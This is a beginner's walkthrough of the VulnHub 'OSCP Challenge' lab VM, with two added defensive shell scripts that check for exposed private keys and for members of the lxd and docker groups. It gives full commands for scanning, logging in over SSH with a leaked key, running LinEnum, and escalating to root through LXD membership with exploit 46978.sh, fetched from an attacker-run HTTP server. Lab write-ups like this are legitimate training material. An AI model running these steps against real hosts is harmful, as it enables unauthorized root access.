CTF : The OSCP Challenge (2024)

Hello friends,

In July of 2020, a neat challenge appeared on the VulnHub page. It was an OSCP Challenge.

The creator FalconSpy did a great write up of the VM, and the many ways to solve it.
It was marked as “Easy”. Keep in mind this term is used frequently, but in actuality there is no specific way to measure the “easy-ness” of any of these challenges, so it is left to the creator to decide that.

I am a beginner in the pen testing / cyber / hacking field, and I have come to find out that all of the “easy” challenges I’ve come across (including this one) should be considered “Intermediate” for anyone who is a beginner, so I approach all challenges with that mentality, and that does help.

These challenges are usually designed to be solved in multiple ways, because we all approach it differently, I used the methods that I know, I’ve had to do some research and tried many things that didn’t work, so your experience may vary.

An expert hacker I know, was able to solve it in 45 minutes.
Me? It took me 3 weeks, but I did solve it, and if I can do it, so can you.

The Goal of the OSCP challenge:
1. Become root.
2. Read the “flag.txt” located in root directory.

Let’s get started.

//SCAN

After making sure the VM is running you now must find its IP. Usually one of these would do the trick for you.

netdiscover
arp-scan -l
arp-scan --interface=wlan0 --localnet (wifi)
arp-scan --interface=eth0 --localnet (cabled)

Neat Trick:
When you set up your VM, you can change the MAC address to something that would make it easy for you to identify that it’s the right machine.

//BROWSE

Now that I have an IP, I open up a browser and go to it, it is a landing page with general information about the challenge, but as I read closely I noticed a couple of things.

1. They say the only user on this box is “OSCP”.
   Yet the post is made by an ‘admin’ account.

2. It’s a WordPress site.

//MASSCAN

This tool does a quicker scan than nmap, but due to its quickness, it may miss something.

masscan [the VM’s IP] -p0-65535 --rate 5000

Results:
33060/tcp on [the VM’s IP]
80/tcp on [the VM’s IP]
22/tcp on [the VM’s IP]

My friend was also doing this challenge and he ran an nmap scan since I was doing the masscan, and he came across a “/secret.txt” finding, so that was my next step.

//SECRET PAGE

On the browser I went to that page.
[the VM’s IP]/secret.txt

It was a text file of an open SSH key.
Saved it locally, and called it “sk3”.
Had to adjust its permissions in order for it to work.
chmod 600 sk3

Tried SSH-ing as admin with that key.
ssh -i sk3 admin@[the VM’s IP]
Didn’t work

Tried the root account
ssh -i sk3 root@[the VM’s IP]
Didn’t work.

Then I remembered the post about OSCP being a user on this machine so I tried this.
ssh -i sk3 oscp@[the VM’s IP]
That worked! I’m in the system.
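
The defensive side of this finding, as an added example that is not part of the original write-up: a scan of a web server's document root for files holding a private key, reporting the URL path each would be served at and whether the key is passphrase-protected. The function names and the sample docroot are assumptions made for the example; the sample key body is only the public OpenSSH format header, not key material.

```sh
#!/bin/sh
# Added example (not from the write-up): find private keys under a document root.
KEY_RE='-----BEGIN ([A-Z0-9]+ )*PRIVATE KEY-----'

# key_protection FILE: prints PLAINTEXT, encrypted or unknown for the key in FILE.
key_protection() {
    if grep -qE -e 'BEGIN ENCRYPTED PRIVATE KEY|^Proc-Type: 4,ENCRYPTED' "$1"; then
        echo encrypted    # PKCS#8 or legacy PEM protected by a passphrase
    elif grep -q -e 'BEGIN OPENSSH PRIVATE KEY' "$1"; then
        # openssh-key-v1 layout: 15-byte magic, 4-byte length, then the cipher
        # name, which is "none" when the key has no passphrase.
        cipher=$(sed -n '/BEGIN OPENSSH/,/END OPENSSH/p' "$1" | sed '/-----/d' |
                 tr -d ' \r\n' | base64 -d 2>/dev/null | tail -c +20 | head -c 4)
        case $cipher in
            none) echo PLAINTEXT ;;
            '')   echo unknown ;;
            *)    echo encrypted ;;
        esac
    else
        echo PLAINTEXT    # legacy PEM without a Proc-Type header
    fi
}

# scan_webroot DOCROOT: prints "/url/path protection" for every file with a key.
scan_webroot() {
    docroot=${1%/}
    grep -rIlE -e "$KEY_RE" "$docroot" 2>/dev/null | sort | while IFS= read -r f; do
        printf '%s %s\n' "${f#"$docroot"}" "$(key_protection "$f")"
    done
}

# Constructed docroot: header-only key files, labelled sample data.
make_docroot() {
    mkdir -p "$1/wp-content"
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' \
        'b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAAB' \
        '-----END OPENSSH PRIVATE KEY-----' > "$1/secret.txt"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
        '-----END RSA PRIVATE KEY-----' > "$1/wp-content/backup.pem"
    echo '<h1>OSCP challenge</h1>' > "$1/index.html"
}

tmp=$(mktemp -d)
make_docroot "$tmp"
scan_webroot "$tmp"
rm -rf "$tmp"
```

Any PLAINTEXT hit means whoever can fetch that URL can log in as the key's owner, so the key should be rotated as well as removed.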

//TOUCH STUFF

Now that I’m in, I need to know what kind of things I can do. An easy way is the “touch” command. So I typed this.
touch anything

That worked, it created a file called “anything”, so that told me that I have the ability to create things. Excellent.
So I created a directory (folder) called ryno
mkdir ryno

I move into it
cd ryno

//ENUMERATE

Out of the tools that I’ve tried, “LinEnum” gave me the result I needed, but the trick with LinEnum is it has to run on the machine you’re attacking, so while logged in (and in my ryno folder) I had to download that file and run it.

LinEnum
It’s a GitHub repo, so you run the “git clone” command to get it.
git clone https://github.com/rebootuser/LinEnum.git

Now, you have to make the “LinEnum.sh” file executable. So navigate to where the file is located, and run this command.
chmod +x LinEnum.sh

Now, you can run it, this is the command that gave me some nice results.
./LinEnum.sh -k keyword -r report -e /tmp/ -t

LinEnum Result:
Tells us we are part of the (lxd) group.
I’m not familiar with that group, so I go to The Oracle (aka Google) to learn more about LXD (Linux Daemon).
Apparently there is an LXC/LXD Privilege Escalation (Priv Esc).
So I research how this is done, for my next step.
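
The check an administrator would run for this same finding, as an added example that is not part of the original write-up: list every account that belongs to a group whose members can become root. The lxd entry comes from the LinEnum result above; the docker entry, the function names and the sample files are assumptions made for the example.

```sh
#!/bin/sh
# Added example (not from the write-up): list accounts in root-equivalent groups.
# lxd is the group found above; docker is an assumption added here because
# membership there grants root the same way.
RISKY_GROUPS="lxd docker"

# audit_groups [GROUP_FILE] [PASSWD_FILE]
# Prints "group:user:how"; how is "supplementary" (listed in the group file)
# or "primary" (the group's GID is the user's GID in the passwd file).
audit_groups() {
    group_file=${1:-/etc/group}
    passwd_file=${2:-/etc/passwd}
    for g in $RISKY_GROUPS; do
        # group(5): name:password:GID:member1,member2
        line=$(grep "^$g:" "$group_file") || continue
        gid=$(printf '%s\n' "$line" | cut -d: -f3)
        for u in $(printf '%s\n' "$line" | cut -d: -f4 | tr ',' ' '); do
            printf '%s:%s:supplementary\n' "$g" "$u"
        done
        # passwd(5): name:password:UID:GID:gecos:home:shell
        awk -F: -v gid="$gid" -v g="$g" \
            '$4 == gid { printf "%s:%s:primary\n", g, $1 }' "$passwd_file"
    done
}

# Constructed sample files modelled on the VM in this write-up.
make_sample() {
    cat > "$1/group" <<'EOF'
root:x:0:
sudo:x:27:
lxd:x:116:oscp
docker:x:998:
EOF
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
oscp:x:1000:1000:oscp:/home/oscp:/bin/bash
builder:x:1001:116:ci:/home/builder:/bin/sh
EOF
}

# Demo on the constructed sample; call audit_groups with no arguments on a real host.
tmp=$(mktemp -d)
make_sample "$tmp"
audit_groups "$tmp/group" "$tmp/passwd"
rm -rf "$tmp"
```

The primary-GID pass matters because an account whose main group is lxd never shows up in the member list of /etc/group.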

//PRIV ESC

I needed 3 things for this to work:
[1] — The Alpine Builder File.
[2] — An .sh file with the lxc/lxd exploit.
[3] — A way to get it loaded into the VM to run the exploit.

[1] — The Alpine File.
Download the “Alpine Builder”.
git clone https://github.com/saghul/lxd-alpine-builder.git

Navigate into the folder you just cloned.
cd lxd-alpine-builder

chmod +x & run the following file.
./build-alpine

That creates a tar file that we will need to upload to the machine.
alpine-v3.12-x86_64-20200801_2112.tar.gz

[2] — The .sh File
I used searchsploit in my terminal to find the exploit.
searchsploit lxd
You are looking for “linux/local/46978.sh”

Copy it over locally.
searchsploit -m 46978.sh

To be safe I made a copy called “ryno.sh”
cp 46978.sh ryno.sh

When I tried to run that file, it gave me “bash\r” error.
After some research I found a way to create a new file removing the ‘\r’ and called it ‘r2.sh’, which fixed that issue.
sed $'s/\r$//' ./ryno.sh > ./r2.sh

[3] — The PYTHON server
This is how I will upload the file from my local box to the VM I’m attacking.

On my machine:
Made sure I’m in the same folder that the Alpine & the r2.sh file are.
Ran this command.
python -m SimpleHTTPServer
(that creates the server (your ip) with port 8000)

On the VM machine:
Since I’m SSH-ed in, I upload the 2 files.
Make sure you’re in the folder that you had created earlier.

Upload the alpine file.
wget http://<your ip>:8000/alpine-v3.12-x86_64-20200801_2112.tar.gz

Upload the r2.sh.
wget http://<your ip>:8000/r2.sh

We need to adjust the permissions for BOTH files in order for it to work.
chmod 777 alpine-v3.12-x86_64-20200801_2112.tar.gz r2.sh

Note:
Instructions may tell you to go to /tmp, but if you do, it may not work for you, and give you a “file not found” error, so it’s safer to do all of this from the directory you created.

//LETS RUN

Now that we have everything in place, let’s run the exploit.
I used this command.
./r2.sh -f alpine-v3.12-x86_64-20200801_2112.tar.gz

If you get a “command not found” for LXC, you just need to add it to the PATH.
Find the location of ‘lxc’.
locate lxc
It was located in the following area:
/snap/bin/

Now let’s add it to the $PATH
echo $PATH
export PATH="$PATH:/snap/bin"
That should fix it.

When that exploit runs properly, you will see a different shell prompt.
Check who you are.
id
(you should be root)

Let’s get to the flag.
cd /mnt/root/root
ls

(you should see the flag.txt and read it)
Challenge completed.

[R/F]

Author: Rob Wisoky